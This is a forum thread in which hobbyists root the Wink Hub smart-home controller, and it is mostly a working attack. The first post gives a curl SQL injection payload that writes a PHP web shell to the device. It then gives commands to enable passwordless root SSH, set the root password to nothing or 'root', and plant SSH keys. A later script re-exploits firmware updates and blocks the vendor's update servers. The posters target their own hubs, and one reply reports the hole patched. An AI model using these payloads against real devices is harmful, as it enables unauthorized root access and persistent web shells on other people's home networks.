Wink Hub root

Search This thread

FreeFly

Member
Feb 22, 2007
45
29
Rooting a Wink Hub with the latest (as of October) firmware (version 0.33) or earlier.

First use a curl command to exploit a SQL injection vulnerability to create a php file used to execute shell commands on the hub:
Code:
curl -d id="1 or 1=1';ATTACH DATABASE '/var/www/exploit.php' AS lol; CREATE TABLE lol.pwn (t TEXT); INSERT INTO lol.pwn (t) VALUES ('<?php passthru(' || char(36) || '_POST[' || char(39) || 'cmd' || char(39) || ']); ?>');--" http://192.168.0.1/dev_detail.php

Now you can supply shell commands to the exploit.php.

If you don't want to mess with ssh keys, now you can run this command to enable root login without using a password. My recommendation would be to immediately ssh in and use the passwd command to change the root password.

Code:
curl -d cmd='sed%20-i%20%27s%2F%3D-sg%2F%3D%2F%27%20%2Fetc%2Fdefault%2Fdropbear%3B%2Fetc%2Finit.d%2FS50dropbear%20restart%3Becho%20-e%20%22%5Cn%5Cn%22%20%7C%20passwd' http://192.168.0.1/exploit.php

For those who don't mind using ssh keys, or want to run other commands:

On the machine I want to copy my ssh key to root so I'd run something like this:
Code:
echo MySSH_PublicKey > /root/.ssh/authorizedkeys

It would be nice if you could just call:
Code:
curl -d cmd='echo MySSH_PublicKey > /root/.ssh/authorizedkeys'
But that won't generally work because of http issues. The key is to urlencode the cmd you want to run using a site like http://meyerweb.com/eric/tools/dencoder/
Just urlencode the bits between the single quotes, the php exploit won't work without the single quotes.

So after getting the urlencoded command I actually invoke:
Code:
curl -d cmd='echo%20MySSH_PublicKey%20%3E%20%2Froot%2F.ssh%2Fauthorizedkeys' http://192.168.0.1/exploit.php

Then you can happily ssh as root to the wink hub!
:victory:
 
Last edited:

nyvram1

Senior Member
Apr 20, 2010
249
48
Then you can happily ssh as root to the wink hub!
:victory:

FIRST REPLY! :good:

This is awesome! I can't wait to see where this goes. We should also get Nashira in here with his awesome android app, BLINK that allows a rooted hub to be controlled locally.

https://github.com/nashira/blink
devices.png

scenes_collapsed.png
 
Last edited:

qnology

Member
Dec 10, 2014
7
0
Nice work. This will make things much easier.

Some people (people running Windows for instance) are having issues generating the ssh keys. As a suggestion, can we incorporate the below so that people can just login as root using a password? I believe this would make things even simplier.

Code:
#commands to allow root login using root as password
sed -i 's/=-sg/=/' /etc/default/dropbear;/etc/init.d/S50dropbear restart
echo -e 'root\nroot' | passwd

I don't have enough post to provide the exact command, but it should be something like:
curl -d cmd='sed%20-i%20%27s%2F%3D-sg%2F%3D%2F%27%20%2Fetc%2Fdefault%2Fdropbear%3B%2Fetc%2Finit.d%2FS50dropbear%20restart' hxxp/ipaddress/exploit.php
curl -d cmd='echo%20-e%20%22root%5Cnroot%22%20%7C%20passwd' hxxp/ipaddress/exploit.php
 
Last edited:

berserko

Member
Dec 11, 2014
13
0
Rooting a Wink Hub with the latest (as of October) firmware (version 0.33) or earlier.

Very nice!

I started lookng for another PHP hole but never looked that hard as my unit was already rooted. I did my upgrade by downloding the app-rootfs.ubi manually and using ubiformat to flash it on.

However in the official Wink app its still showing me version 0 I've been wading through the upgrade scripts to see where it set's version 33 its in /database somehere If you could take a look at your device and let me know I'd very much appreciate it.

I also have a pretty good script that downloads the update re-exploits the update before it installs the update with ubiformat. There is about 4 or 5 places that have a lot of this wink rooting data. If there is interest I would be happy to setup a forum to focus the very small "scene"

If anyone has setup a kidde smoke alarm via aprontest let me know I have had much luck as of yet. I'll certainly post if I make some headway.
 

Nabors

New member
Dec 11, 2014
1
0
Very nice!

I started lookng for another PHP hole but never looked that hard as my unit was already rooted. I did my upgrade by downloding the app-rootfs.ubi manually and using ubiformat to flash it on.

However in the official Wink app its still showing me version 0 I've been wading through the upgrade scripts to see where it set's version 33 its in /database somehere If you could take a look at your device and let me know I'd very much appreciate it.

I also have a pretty good script that downloads the update re-exploits the update before it installs the update with ubiformat. There is about 4 or 5 places that have a lot of this wink rooting data. If there is interest I would be happy to setup a forum to focus the very small "scene"

If anyone has setup a kidde smoke alarm via aprontest let me know I have had much luck as of yet. I'll certainly post if I make some headway.
Here are the files that report the versions to the app.

echo "00.01" > /database/cf_build
echo "00.01" > /database/cf_fver2
echo "00.33" > /database/cf_fver3
 

automonkey

New member
Dec 11, 2014
2
0
There is about 4 or 5 places that have a lot of this wink rooting data. If there is interest I would be happy to setup a forum to focus the very small "scene"

Someone over at slickdeals did but doesn't look like there is anything happening over there yet. He's got some links but that is about it.

homeautomation proboards com/board/3/wink-hub

---------- Post added at 01:52 AM ---------- Previous post was at 01:16 AM ----------

Then you can happily ssh as root to the wink hub!
:victory:

It doesn't seem to be taking my key? I can't ssh into it.
disconnected: no supported authentication methods available (server sent publickey)?
 

qnology

Member
Dec 10, 2014
7
0
00.47 is out and this particular sql injection has been closed

00.47 is out and this particular sql injection has been closed
 
Dec 11, 2014
10
0
FIRST REPLY! :good:

This is awesome! I can't wait to see where this goes. We should also get Nashira in here with his awesome android app, BLINK that allows a rooted hub to be controlled locally.

I'm also interested in Nashira's project, but I'm looking to use his work to figure out how to send commands from a Raspberry Pi that will be the equivalent of pushing a light-on button on the Android app. Being able to issue commands to the wink by running a python script, for example, would open up the hub to be used in conjunction with lots of home automation platforms. I have a bunch of cheap Arduino sensors integrated with an open source home automation system that is much more flexible than Wink, so I'd just like to use the Wink hub for its radios.

It looks like you can do a HTTP post to mimic a button push, but that's something I'm not familiar with. If someone has any insights, I'd appreciate it.

---------- Post added at 05:21 AM ---------- Previous post was at 05:13 AM ----------

BLINK does look very nice. I'd originally wanted to root the hubs just to run my own scripts for home automation, but that app is very cool.
:good:

Hey, that's what I'm interested in too. Do you think you can use his Android app to figure out how to send HTTP posts to the Wink hub?

00.47 is out and this particular sql injection has been closed

Qnology, when did that happen? Is it on the "wink-hub-images.s3.amazonaws.com/00.01/app-rootfs.ubi"? I just manually updated my rooted hub today with that .ubi file. Wonder if I upgraded to 0.33 or 0.47?? I don't even know how to find out.
 

FreeFly

Member
Feb 22, 2007
45
29
Do you think you can use his Android app to figure out how to send HTTP posts to the Wink hub?
Pretty easy. His API is https://github.com/nashira/blink/blob/master/server/api/commands/index.php It's really a wrapper for the aprontest command. Pretty easy to use python to send JSON messages to the commands/index.php. Play with aprontest by itself for a bit first and you'll understand how to use it to switch and dim the lights:
http://gtvhacker.com/index.php/Wink_Hub​​

Then you'll understand you just send a command (update) with the master id for the light you want to switch, and value id (1 for dim, 2 for on/off), and a corresponding value (1-255 for dim / ON or OFF) wrap it in JSON and send to command/index.php
;)


I'm going to write some code to do this myself so I'll post some samples here when I do.
 
Last edited:

qnology

Member
Dec 10, 2014
7
0
Qnology, when did that happen? Is it on the "wink-hub-images.s3.amazonaws.com/00.01/app-rootfs.ubi"? I just manually updated my rooted hub today with that .ubi file. Wonder if I upgraded to 0.33 or 0.47?? I don't even know how to find out.

I guess yesterday. I upgraded a new out of box Win Hub using the iOS Wink App thinking that I would get 00.33. When I ran the curl command against dev_detail.php and received a 404, I checked my iOS Wink app and it showed that the Hub was on firmware 00.47.
 

berserko

Member
Dec 11, 2014
13
0
Qnology, when did that happen? Is it on the "wink-hub-images.s3.amazonaws.com/00.01/app-rootfs.ubi"? I just manually updated my rooted hub today with that .ubi file. Wonder if I upgraded to 0.33 or 0.47?? I don't even know how to find out.

Run an MD5sum against your app-rootfs.ubi if the md5sum is 55574706f2cbf4f6e17e4d224b63287d then you have version 47. I don't havre the 33 md5sum in front of me I'll post it if I can find it...

---------- Post added at 02:38 PM ---------- Previous post was at 02:20 PM ----------

Run an MD5sum against your app-rootfs.ubi if the md5sum is 55574706f2cbf4f6e17e4d224b63287d then you have version 47. The MD5sum for 33 is eec07feee1fa1a4a06e05a00af18156f

I found the update went live at:

2014-12-10T22:16:58.000Z

I assume Z means zulu so 5:16pm eastern?
 
Last edited:

berserko

Member
Dec 11, 2014
13
0
Here is the commands I used to upgrade my pre-rooted Wink for 33 to 47

Hope this helps:
Code:
echo "1" > /database/DO_UPDATE
reboot

Once it comes back in upgrade mode I ran the following:
Code:
cd /tmp
echo "127.0.0.1       localhost" > /etc/hosts
echo "127.0.0.1       flex-dvt" >> /etc/hosts
wget hXXp://wink-hub-images.s3.amazonaws.com/00.01/app-rootfs.ubi <--- Fix the URL forum is breaking it on me...
ubiformat /dev/mtd5 -f /tmp/app-rootfs.ubi
ubiattach -p /dev/mtd5
mkdir /tmp/updater
mount -t ubifs ubi2:rootfs /tmp/updater
sed -i 's/=-sg/=/' /tmp/updater/etc/default/dropbear
rm -f /tmp/updater/etc/init.d/S99local
cp /var/www/set_dev_value.php /tmp/updater/var/www
fw_setenv bootdelay 5
sed -i 's/bootdelay       0/bootdelay       5/' /database_default/u-boot.env
cp /etc/shadow /tmp/updater/etc
mkdir /tmp/updater/root/.ssh
cp /root/.ssh/authorized_keys /tmp/updater/root/.ssh/authorized_keys
echo "127.0.0.1       hub-api.winkapp.com"  >> /tmp/updater/etc/hosts
echo "127.0.0.1       hub-updates.winkapp.com" >> /tmp/updater/etc/hosts
echo "127.0.0.1       wink-hub-images.s3.amazonaws.com" >> /tmp/updater/etc/hosts
sed -i 's/rm \/database\/wpa_supplicant.conf/echo WPA Fix #rm \/database\/wpa_supplicant.conf/' /tmp/updater/etc/init.d/S31platform
sed -i 's/#ttyAM0/ttyAM0/' /tmp/updater/etc/inittab
echo "00.01" > /database/cf_build
echo "00.01" > /database/cf_fver2
echo "00.47" > /database/cf_fver3
echo "127.0.0.1       hub-api.winkapp.com"  >> /etc/hosts
echo "127.0.0.1       hub-updates.winkapp.com" >> /etc/hosts
echo "127.0.0.1       wink-hub-images.s3.amazonaws.com" >> /etc/hosts
echo "0" > /database/DO_UPDATE
reboot

Once the reboot completes the device will come back online as version 47 This worked fine for me but as always YMMV. The script keeps creates enough holes you should be able to get back in one way or another...
 
Last edited:

qnology

Member
Dec 10, 2014
7
0
681

Starting from a new in box Wink Hub, is there anything I need to do before hand to make sure I can SSH into the "upgrade mode" partition? It'a not clear if people are using a Serial Console connection to access the "upgrade mode" partition or if they are SSHing in. For SSH access, I would assume the authorized_keys file needs to be updated (so the upgrade mode partition would need to be mounted and updated). Just need some confirmation. Thank you


Here is the commands I used to upgrade my pre-rooted Wink for 33 to 47

Hope this helps:
Code:
echo "1" > /database/DO_UPDATE
reboot
 
Last edited:
Dec 11, 2014
10
0
Run an MD5sum against your app-rootfs.ubi if the md5sum is 55574706f2cbf4f6e17e4d224b63287d then you have version 47. I don't havre the 33 md5sum in front of me I'll post it if I can find it...


I ran a MD5sum on the copy of app-rootfs.ubi that I downloaded from the the amazon aws link sometime on dec 10th. It is "eec07feee1fa1a4a06e05a00af18156f".

I have no idea if it's v0.33 or 0.47. If someone else has a file they're sure is 0.33, can they run a MD5sum on it?
 

jpkboca

Member
Oct 4, 2010
11
1
If I rooted and never updated, so I have original firmware, can I use the method you described to go straight to 47?

Thanks
Jeff


Starting from a new in box Wink Hub, is there anything I need to do before hand to make sure I can SSH into the "upgrade mode" partition? It'a not clear if people are using a Serial Console connection to access the "upgrade mode" partition or if they are SSHing in. For SSH access, I would assume the authorized_keys file needs to be updated (so the upgrade mode partition would need to be mounted and updated). Just need some confirmation. Thank you
 

Top Liked Posts

  • There are no posts matching your filters.
  • 1
    Only set bootdelay with active UART connection

    After unplugging the UART and assembling the Hub I found out that with bootdelay set to non-zero it will not boot (solid green light) unless there is a UART connection present. You probably want to set this back to zero when you are done rooting.